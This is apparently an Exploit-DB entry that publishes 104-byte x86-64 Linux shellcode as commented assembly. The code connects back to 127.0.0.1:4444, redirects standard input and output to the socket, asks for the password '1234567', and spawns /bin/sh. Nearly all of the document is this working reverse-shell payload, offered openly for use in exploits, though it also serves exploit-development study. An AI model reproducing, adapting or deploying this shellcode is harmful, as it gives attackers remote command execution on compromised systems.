Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)

EDB-ID:

43952

CVE:

N/A


Platform:

Linux_x86-64

Published:

2017-11-11

global _start

_start:

        ; sock = socket(AF_INET, SOCK_STREAM, 0)
        ; AF_INET = 2
        ; SOCK_STREAM = 1
        ; syscall number 41 

        push 41
        pop rax
        push 2
        pop rdi
        push 1
        pop rsi
        cdq
        syscall

        ; copy socket descriptor to rdi for future use 
        xchg rdi, rax

        ; server.sin_family = AF_INET 
        ; server.sin_port = htons(PORT)
        ; server.sin_addr.s_addr = inet_addr("127.0.0.1")
        ; bzero(&server.sin_zero, 8)

        push rdx ; already zeroed by "cdq" instruction
        mov rbx, 0xfeffff80a3eefffd
        not rbx
        push rbx

        ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
       
	push rsp
	pop rsi 
        mov al,42
        mov dl,16
        syscall

        ; duplicate sockets

        ; dup2 (new, old)

        push 3
        pop rsi
dup2cycle:
        mov al, 33
        dec esi
        syscall
        loopnz dup2cycle       
        
        ; read passcode
        ; xor rax,rax - already zeroed out by prev cycle
        xor rdi,rdi
        push rax
	push rsp
	pop rsi
        mov dl,8
        syscall

        ; Authentication with password "1234567"
        xchg rcx,rax
        mov rbx,0x0a37363534333231
        push rbx
	push rsp
	pop rdi
        repe cmpsb
        jnz wrong_pwd

        ; execve stack-method

        push 59
        pop rax
        cdq ; extends rax sign into rdx, zeroing it out
        push rdx
        mov rbx, 0x68732f6e69622f2f
        push rbx
	push rsp
	pop rdi
        push rdx
	push rsp
	pop rdx
        push rdi
	push rsp
	pop rsi
        syscall

wrong_pwd:
        nop